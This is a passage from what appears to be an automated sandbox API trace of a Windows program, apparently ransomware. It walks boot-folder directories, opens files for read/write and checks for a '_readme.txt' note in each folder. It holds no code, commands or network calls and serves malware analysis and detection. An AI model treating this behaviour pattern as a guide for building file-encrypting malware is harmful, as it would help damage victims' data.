(in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.151] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.151] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0058.151] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.151] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216638 [0058.151] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.151] PathFindExtensionW (pszPath="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned=".mui" [0058.151] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.151] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0058.151] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea87470, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0058.151] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.151] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216638 [0058.151] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.151] PathFindExtensionW (pszPath="C:\\Boot\\da-DK\\_readme.txt") returned=".txt" [0058.151] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0058.151] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea87470, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0058.151] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.151] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.151] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e950 | out: hHeap=0x660000) returned 1 [0058.151] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e950 [0058.152] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.152] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.152] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.152] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.152] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.152] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.152] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.152] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.152] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.152] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.152] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.152] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.152] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.152] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.152] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.152] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.152] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.153] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.153] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.153] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.153] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.153] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.153] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.153] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.153] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.153] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.153] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.153] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.153] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.153] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.153] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.153] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.153] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.153] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.153] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.153] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.153] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.153] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.153] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.153] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.153] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.153] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.153] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.153] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.153] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.153] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.153] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.153] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.153] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.153] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.153] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.153] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.153] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.153] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.154] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.154] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.154] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.154] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.154] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.154] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.154] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.154] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.154] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.154] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.154] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.154] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.154] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.154] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.154] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.154] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.154] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.154] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.156] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.156] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.156] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.156] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.156] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.156] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.156] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.156] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.156] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.156] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.156] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.156] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.156] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.156] PathFindFileNameW (pszPath="C:\\Boot\\de-DE\\") returned="de-DE\\" [0058.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.156] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0058.156] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.156] PathFindFileNameW (pszPath="") returned="" [0058.157] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0058.157] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0058.157] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3268798 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0058.157] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0058.157] PathAppendW (in: pszPath="C:\\Boot\\de-DE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0058.157] PathFileExistsW (pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0058.157] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.157] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.157] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0058.158] PathFindExtensionW (pszPath="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned=".mui" [0058.158] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.158] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea87470, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0058.158] PathFindExtensionW (pszPath="C:\\Boot\\de-DE\\_readme.txt") returned=".txt" [0058.158] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea87470, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, 